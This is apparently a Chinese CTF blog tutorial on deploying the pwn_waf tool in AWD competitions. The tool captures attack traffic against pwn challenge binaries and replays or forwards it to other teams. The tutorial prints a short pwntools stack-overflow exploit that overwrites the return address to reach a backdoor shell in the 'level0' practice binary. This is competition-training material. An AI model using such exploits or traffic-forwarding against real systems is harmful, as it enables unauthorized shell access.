AWD-PWN流量监控与抄流量反打

RE手 在AWD中比较做牢，队伍里也没pwn手，在awd出现pwn靶机比较坐牢。之前都不知道pwn靶机可以抄流量反打。

参考pwn_waf：https://github.com/i0gan/pwn_waf/tree/main

该waf有四个模式

CATCH模式只是简单的捕获被攻击的交互流量，可以在日志路径下查看。

I0GAN模式是一种防御模式，可以防止攻击者拿到shell，也可以查看攻击者的交互流量。

FORWARD模式只是简单的转发攻击者的流量去打别人，我们可以在中间过程抓到攻击者的流量。当然，如果攻击者成功获取到flag，我们也可以在日志文件中获取到flag。

FORWARD_MUTIL 是基于 FORWARD 模式的，它主要从 hosts.txt 文件中循环获取受害者的主机信息，然后将攻击者的流量转发给受害者。

我这里是本地测CATCH模式

准备工作->编译

这里下载完项目之后，打开makefile文件



LOG_PATH 为一个可读可写的目录，

ARCH 为pwn附件的位数

这里我选择附件:https://files.buuoj.cn/files/9dceb1281f528e9408c6ed989e9fc13c/level0



这里exp为

from pwn import *
p=process('./pwn')
door_addresss=0x400597
shellcode=(0x80+0x8)*b'a'+p64(door_addresss)
p.sendline(shellcode)
p.interactive()

这里程序64位

ARCH 位64

防御日志放在



这里我之前测试过，把该目录删除





此时我们会多一个catch文件和LOG_PATH目录下的test目录

此时把catch 放入 test

流量监控的部署

这里给予我们日志目录可读可写的权限

chmod 777 test

将要防护的pwn文件，复制到对应的目录

cp /level0 LOG_PATH

用catch 或者 i0gan 、 forward 替换原始的pwn文件

把pwn附件重命名

./level0 -> ./pwn

这样流量监控就完成了

日志查看

我们pwn靶机遭到攻击就会记录流量

这里流量就被记录了，我们直接抄。